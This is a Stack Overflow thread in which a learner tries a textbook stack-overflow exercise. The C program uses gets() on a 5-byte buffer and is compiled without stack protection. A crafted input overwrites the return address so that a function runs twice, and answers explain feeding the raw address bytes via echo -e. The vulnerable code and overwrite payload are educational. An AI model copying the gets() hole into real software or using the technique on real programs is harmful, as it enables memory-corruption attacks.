1

I was experimenting with a code described in the "Shell coders handbook" where you overflow a buffer and cause the same code to be executed twice...

void return_input (void)
{ char array[5]; 
  gets (array); 
  printf(“%s\n”, array); 
}
 main() 
 { 
  return_input();
  return 0; 
 }

The task was to overwrite the buffer and to replace the address of 'return 0' with the address of 'return_input()' so that the entered string is printed twice..

i compiled it as follows 

gcc -fno-stack-protector overflow.c

to override the protection mechanisms. The problem is i cant get it to execute twice. in this case the address of the function ri() is at 0x08048440 . I gave the input as follows

./a.out
aaaaaaaaaaaaa\x40\x84\x04\x08

shouldnt this cause the function to be called twice?? It always returns 

aaaaaaaaaaaaaaaa�� 
Segmentation fault (core dumped)

How can i overflow the buffer to call the function twice?

Improve this question
2
  • @BenGreen i am trying to learn by myself. If this question was assigned as a homework, the tutors would have already taught me how to run a basic exploit and then try out it on my own. or in english - I wouldnt have asked this question in the first place :) Commented Jun 1, 2013 at 11:37
  • 1
    @BenGreen the homework tag has been deprecated months ago and is now removed: meta.stackexchange.com/questions/147100/… Commented Jun 1, 2013 at 11:45

3 Answers 3

Reset to default
1

\x40\x84\x04\x08 is not supported. You should use some other program to translate the hex input to bytes.

If you are using bash, you can try echo -e '\x40\x84\x04\x08' | ./a.out. I found that solution at linux shell scripting: hex string to bytes

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

0

By definition, the behavior of a buffer overflow is unpredictable. You will only get the same behavior if you happen to be using the same version of the same compiler with the same settings on the same OS, etc., etc.

Improve this answer

Comments

0

based on your machine type , you might need to adjust. http://www.tenouk.com/Bufferoverflowc/Bufferoverflow4.html

Improve this answer

3 Comments

Thank you so very much for this information . It works!!!! I would like to learn more about this subject and would be greatly indebted to you if you can share more resource. Hope you would help. Thanka again ! :)
If the information was relevant , Please mark it as the answer.
This link should allow you to experiment and correct your code :users.ece.cmu.edu/~jprimero/Simulator.html. Copy paste your code above and see the execution in action.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.